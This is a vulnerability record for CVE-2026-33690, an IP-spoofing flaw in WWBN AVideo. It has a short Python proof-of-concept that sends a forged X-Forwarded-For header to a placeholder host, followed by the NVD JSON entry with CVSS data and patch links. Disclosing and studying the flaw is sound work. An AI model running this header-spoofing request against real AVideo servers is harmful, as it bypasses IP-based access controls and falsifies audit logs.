CVE-2026-33690

import requests # Target URL of the vulnerable AVideo instance target_url = "http://example.com/avideo/" # Spoofed IP address (e.g., an internal trusted IP or admin IP) spoofed_ip = "127.0.0.1" # Headers to send with the request headers = { "X-Forwarded-For": spoofed_ip, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Send GET request with forged headers response = requests.get(target_url, headers=headers) # Check if the request was successful if response.status_code == 200: print("[+] Request sent successfully.") print(f"[+] Server responded with status code: {response.status_code}") print(f"[+] Attempted to spoof IP as: {spoofed_ip}") print("[+] Check the application logs or access control results to verify exploitation.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33690", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:42.173", "lastModified": "2026-03-25T15:06:07.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `getRealIpAddr()` function in `objects/functions.php` trusts user-controlled HTTP headers to determine the client's IP address. An attacker can spoof their IP address by sending forged headers, bypassing any IP-based access controls or audit logging. Commit 1a1df6a9377e5cc67d1d0ac8ef571f7abbffbc6c contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de vídeo de código abierto. En versiones hasta la 26.0 inclusive, la función 'getRealIpAddr()' en 'objects/functions.php' confía en los encabezados HTTP controlados por el usuario para determinar la dirección IP del cliente. Un atacante puede falsificar su dirección IP enviando encabezados falsificados, eludiendo cualquier control de acceso basado en IP o registro de auditoría. El commit 1a1df6a9377e5cc67d1d0ac8ef571f7abbffbc6c contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-348"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/1a1df6a9377e5cc67d1d0ac8ef571f7abbffbc6c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8p2x-5cpm-qrqw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}